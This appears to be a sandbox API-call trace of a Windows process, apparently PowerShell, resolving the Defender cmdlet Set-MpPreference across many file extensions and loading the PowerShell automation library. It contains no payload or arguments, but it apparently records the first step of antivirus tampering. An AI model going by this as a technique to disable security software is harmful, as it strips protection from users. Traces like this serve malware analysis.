	[0089.918] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference.VBS", lpFindFileData=0x3b18e0 | out: lpFindFileData=0x3b18e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0089.918] GetLastError () returned 0x2
	[0089.918] SetErrorMode (uMode=0x1) returned 0x1
	[0089.918] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x43ae800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0089.918] GetLastError () returned 0x2
	[0089.918] SetErrorMode (uMode=0x1) returned 0x1
	[0089.918] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference.VBE", lpFindFileData=0x3b18e0 | out: lpFindFileData=0x3b18e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0089.918] GetLastError () returned 0x2
	[0089.918] SetErrorMode (uMode=0x1) returned 0x1
	[0089.918] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x43ae800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0089.918] GetLastError () returned 0x2
	[0089.918] SetErrorMode (uMode=0x1) returned 0x1
	[0089.918] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference.JS", lpFindFileData=0x3b18e0 | out: lpFindFileData=0x3b18e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0089.918] GetLastError () returned 0x2
	[0089.919] SetErrorMode (uMode=0x1) returned 0x1
	[0089.919] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x43ae800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0089.919] GetLastError () returned 0x2
	[0089.919] SetErrorMode (uMode=0x1) returned 0x1
	[0089.919] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference.JSE", lpFindFileData=0x3b18e0 | out: lpFindFileData=0x3b18e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0089.919] GetLastError () returned 0x2
	[0089.919] SetErrorMode (uMode=0x1) returned 0x1
	[0089.919] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x43ae800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0089.919] GetLastError () returned 0x2
	[0089.919] SetErrorMode (uMode=0x1) returned 0x1
	[0089.919] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference.WSF", lpFindFileData=0x3b18e0 | out: lpFindFileData=0x3b18e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0089.920] GetLastError () returned 0x2
	[0089.920] SetErrorMode (uMode=0x1) returned 0x1
	[0089.920] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x43ae800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0089.920] GetLastError () returned 0x2
	[0089.920] SetErrorMode (uMode=0x1) returned 0x1
	[0089.920] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference.WSH", lpFindFileData=0x3b18e0 | out: lpFindFileData=0x3b18e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0089.920] GetLastError () returned 0x2
	[0089.920] SetErrorMode (uMode=0x1) returned 0x1
	[0089.920] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x43ae800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0089.920] GetLastError () returned 0x2
	[0089.920] SetErrorMode (uMode=0x1) returned 0x1
	[0089.920] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference.MSC", lpFindFileData=0x3b18e0 | out: lpFindFileData=0x3b18e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0089.920] GetLastError () returned 0x2
	[0089.920] SetErrorMode (uMode=0x1) returned 0x1
	[0089.920] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x43ae800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0089.920] GetLastError () returned 0x2
	[0089.920] SetErrorMode (uMode=0x1) returned 0x1
	[0089.921] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference", lpFindFileData=0x3b18e0 | out: lpFindFileData=0x3b18e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0089.921] GetLastError () returned 0x2
	[0089.921] SetErrorMode (uMode=0x1) returned 0x1
	[0089.921] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x43ae800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0089.921] GetLastError () returned 0x2
	[0089.921] SetErrorMode (uMode=0x1) returned 0x1
	[0089.921] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference.ps1", lpFindFileData=0x3b18e0 | out: lpFindFileData=0x3b18e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0089.921] GetLastError () returned 0x2
	[0089.921] SetErrorMode (uMode=0x1) returned 0x1
	[0089.921] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x43ae800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0089.921] GetLastError () returned 0x2
	[0089.921] SetErrorMode (uMode=0x1) returned 0x1
	[0089.921] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference.psm1", lpFindFileData=0x3b18e0 | out: lpFindFileData=0x3b18e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0089.921] GetLastError () returned 0x2
	[0089.922] SetErrorMode (uMode=0x1) returned 0x1
	[0089.922] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x43ae800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0089.922] GetLastError () returned 0x2
	[0089.922] SetErrorMode (uMode=0x1) returned 0x1
	[0089.922] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference.psd1", lpFindFileData=0x3b18e0 | out: lpFindFileData=0x3b18e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0089.922] GetLastError () returned 0x2
	[0089.922] SetErrorMode (uMode=0x1) returned 0x1
	[0089.922] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x43ae800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0089.922] GetLastError () returned 0x2
	[0089.922] SetErrorMode (uMode=0x1) returned 0x1
	[0089.922] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference.COM", lpFindFileData=0x3b18e0 | out: lpFindFileData=0x3b18e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0089.922] GetLastError () returned 0x2
	[0089.922] SetErrorMode (uMode=0x1) returned 0x1
	[0089.922] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x43ae800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0089.923] GetLastError () returned 0x2
	[0089.923] SetErrorMode (uMode=0x1) returned 0x1
	[0089.923] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference.EXE", lpFindFileData=0x3b18e0 | out: lpFindFileData=0x3b18e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0089.923] GetLastError () returned 0x2
	[0089.923] SetErrorMode (uMode=0x1) returned 0x1
	[0089.923] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x43ae800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0089.923] GetLastError () returned 0x2
	[0089.923] SetErrorMode (uMode=0x1) returned 0x1
	[0089.923] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference.BAT", lpFindFileData=0x3b18e0 | out: lpFindFileData=0x3b18e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0089.923] GetLastError () returned 0x2
	[0089.923] SetErrorMode (uMode=0x1) returned 0x1
	[0089.923] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x43ae800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0089.923] GetLastError () returned 0x2
	[0089.923] SetErrorMode (uMode=0x1) returned 0x1
	[0089.923] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference.CMD", lpFindFileData=0x3b18e0 | out: lpFindFileData=0x3b18e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0089.924] GetLastError () returned 0x2
	[0089.924] SetErrorMode (uMode=0x1) returned 0x1
	[0089.924] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x43ae800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0089.924] GetLastError () returned 0x2
	[0089.924] SetErrorMode (uMode=0x1) returned 0x1
	[0089.924] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference.VBS", lpFindFileData=0x3b18e0 | out: lpFindFileData=0x3b18e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0089.924] GetLastError () returned 0x2
	[0089.924] SetErrorMode (uMode=0x1) returned 0x1
	[0089.924] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x43ae800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0089.924] GetLastError () returned 0x2
	[0089.924] SetErrorMode (uMode=0x1) returned 0x1
	[0089.924] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference.VBE", lpFindFileData=0x3b18e0 | out: lpFindFileData=0x3b18e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0089.924] GetLastError () returned 0x2
	[0089.924] SetErrorMode (uMode=0x1) returned 0x1
	[0089.924] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x43ae800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0089.924] GetLastError () returned 0x2
	[0089.924] SetErrorMode (uMode=0x1) returned 0x1
	[0089.925] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference.JS", lpFindFileData=0x3b18e0 | out: lpFindFileData=0x3b18e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0089.925] GetLastError () returned 0x2
	[0089.925] SetErrorMode (uMode=0x1) returned 0x1
	[0089.925] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x43ae800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0089.925] GetLastError () returned 0x2
	[0089.925] SetErrorMode (uMode=0x1) returned 0x1
	[0089.925] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference.JSE", lpFindFileData=0x3b18e0 | out: lpFindFileData=0x3b18e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0089.925] GetLastError () returned 0x2
	[0089.925] SetErrorMode (uMode=0x1) returned 0x1
	[0089.925] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x43ae800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0089.925] GetLastError () returned 0x2
	[0089.925] SetErrorMode (uMode=0x1) returned 0x1
	[0089.925] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference.WSF", lpFindFileData=0x3b18e0 | out: lpFindFileData=0x3b18e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0089.926] GetLastError () returned 0x2
	[0089.926] SetErrorMode (uMode=0x1) returned 0x1
	[0089.926] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x43ae800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0089.926] GetLastError () returned 0x2
	[0089.926] SetErrorMode (uMode=0x1) returned 0x1
	[0089.926] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference.WSH", lpFindFileData=0x3b18e0 | out: lpFindFileData=0x3b18e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0089.926] GetLastError () returned 0x2
	[0089.926] SetErrorMode (uMode=0x1) returned 0x1
	[0089.926] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x43ae800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0089.926] GetLastError () returned 0x2
	[0089.926] SetErrorMode (uMode=0x1) returned 0x1
	[0089.926] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference.MSC", lpFindFileData=0x3b18e0 | out: lpFindFileData=0x3b18e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0089.926] GetLastError () returned 0x2
	[0089.926] SetErrorMode (uMode=0x1) returned 0x1
	[0089.926] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x43ae800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0089.926] GetLastError () returned 0x2
	[0089.926] SetErrorMode (uMode=0x1) returned 0x1
	[0089.927] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference", lpFindFileData=0x3b18e0 | out: lpFindFileData=0x3b18e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0089.927] GetLastError () returned 0x2
	[0089.927] SetErrorMode (uMode=0x1) returned 0x1
	[0089.929] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b1740, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0089.929] GetLastError () returned 0xcb
	[0089.929] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x43ae88c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.929] GetLastError () returned 0x2
	[0089.929] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x43ae83c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.929] GetLastError () returned 0x2
	[0089.929] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x43ae83c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.929] GetLastError () returned 0x2
	[0089.929] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x43ae83c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.929] GetLastError () returned 0x2
	[0089.966] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b1740, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0089.966] GetLastError () returned 0xcb
	[0090.063] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b1740, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0090.063] GetLastError () returned 0xcb
	[0090.067] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b1740, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0090.067] GetLastError () returned 0xcb
	[0090.085] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b1740, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0090.085] GetLastError () returned 0xcb
	[0090.089] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b1740, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0090.089] GetLastError () returned 0xcb
	[0090.091] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b1740, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0090.091] GetLastError () returned 0xcb
	[0090.105] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b1740, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0090.105] GetLastError () returned 0xcb
	[0090.131] VirtualQuery (in: lpAddress=0x43ad88c, lpBuffer=0x43ae88c, dwLength=0x1c | out: lpBuffer=0x43ae88c*(BaseAddress=0x43ad000, AllocationBase=0x3a20000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0090.158] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b1740, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0090.158] GetLastError () returned 0xcb
	[0090.190] VirtualQuery (in: lpAddress=0x43ad88c, lpBuffer=0x43ae88c, dwLength=0x1c | out: lpBuffer=0x43ae88c*(BaseAddress=0x43ad000, AllocationBase=0x3a20000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
